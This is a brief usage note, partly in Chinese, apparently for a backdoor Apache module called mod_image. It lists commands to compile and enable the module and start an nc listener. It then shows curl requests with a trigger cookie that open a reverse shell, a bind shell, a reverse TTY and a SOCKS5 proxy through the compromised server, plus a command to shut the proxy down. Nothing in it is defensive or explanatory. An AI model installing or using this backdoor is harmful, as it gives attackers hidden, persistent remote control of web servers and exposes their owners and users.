- wget
- sudo apxs -i -a -c mod_image.c sblist.c sblist_delete.c server.c -Wl,-lutil
- sudo a2enmod image
- sudo systemctl restart apache2
- 无命令apxs需要安装 sudo apt-get install apache2-dev
nc监听 nc -lvp 1337
vps执行 curl -H 'Cookie: Hm_lpvt_8b02a318fde5831da10426656a43d0=1578566297' http://127.0.0.1/redirect/127.0.0.1/1337/bash
curl -H 'Cookie: Hm_lpvt_8b02a318fde5831da10426656a43d0=1578566297' http://127.0.0.1/bind/1337 nc 127.0.0.1 1331
curl -H 'Cookie: Hm_lpvt_8b02a318fde5831da10426656a43d0=1578566297' http://127.0.0.1/revtty/127.0.0.1/1337
- curl -H 'Cookie: Hm_lpvt_8b02a318fde5831da10426656a43d0=1578566297' http://172.16.145.153/proxy/1337/vlad
- curl -x socks5://vlad:Hm_lpvt_8b02a318fde5831da10426656a43d0=1578566297@<172.16.145.153>:1337 https://www.google.com
- 代理取消echo "imdonewithyou" | nc 172.16.145.153 1337